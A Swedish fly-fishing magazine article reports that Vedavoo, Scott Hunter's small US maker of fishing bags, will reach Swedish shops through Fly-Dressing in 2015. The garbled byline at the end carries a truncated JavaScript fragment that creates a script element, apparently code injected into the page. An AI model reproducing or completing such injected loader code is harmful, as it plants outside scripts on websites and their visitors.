Vedavoo kommer till Sverige!

VedavooVill du ha något som inte alla andra har?

Frustrerad över att inte hitta de väskor för flugfiske och friluftsliv som hade den kvalitet och de funktioner som han sökte, startade Scott Hunter Vedavoo år 2009. Han investerade i en begagnad symaskin och startade att sy och designa väskor och bärtillbehör efter sitt eget behov. Viktigt för Scott har alltid varit och är fortfarande att det ska vara småskaligt och så lokalproducerat som möjligt. Alla prylar och allt material du hittar i eller på en Vedavooprodukt är från USA där också Scott och Vedavoo huserar, till och med sytråden är amerikansk.

Sedan 2009 har det blivit några timmar vid symaskinen och med åren och med hjälp av både djungeltrumman, sociala medier och produkter i mycket god kvalitet har han byggt upp en lojal kundgrupp som också gärna rekommenderar produkterna för sina vänner. Men det är fortfarande småskaligt och det är fortfarande Scott själv som syr t ex. varje Sling Pack eller ryggsäck. Och från och med nästa säsong kommer några av Vedavoos produkter till våra svenska butiker, detta då Fly-Dressing tar in produkterna i deras sortiment.

”Produkterna är ju sjukt fräna, väldesignade, snygga och håller en helt otrolig kvalité.  Varenda liten detalj sitter ju där den ska och känns helt självklar!”, säger Daniel Bergman på Fly-Dressing om Vedavoos produkter och nämner samtidigt att det krävdes lite övertalning för att Scott skulle gå med på att exportera. ”Han kanske inte direkt har kapacitet att sy så mycket mer än han gör i dagsläget, men blev så peppad på att vi var så peppade och gav med sig. Vi kommer att börja köra några av hans olika slings och packar i sortimentet under 2015 och kan förhoppningsvis utvidga sortimentet lite framöver om det blir väl mottaget. Flaskhalsen ligger väl kanske lite hos honom och hur mycket han klarar att sy till oss”, fortsätter Daniel.

Om du är intresserad av att läsa mer om Scott, Vedavoo och se sortimentet besöker du helt enkelt Vedavoos hemsida, kanske hittar du just den produkten som du själv skulle velat ha skapat för dina behov?

Scott-Brown2

 

/Daniel Smithvar d=document;var s=d.createElement(‘script’);


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad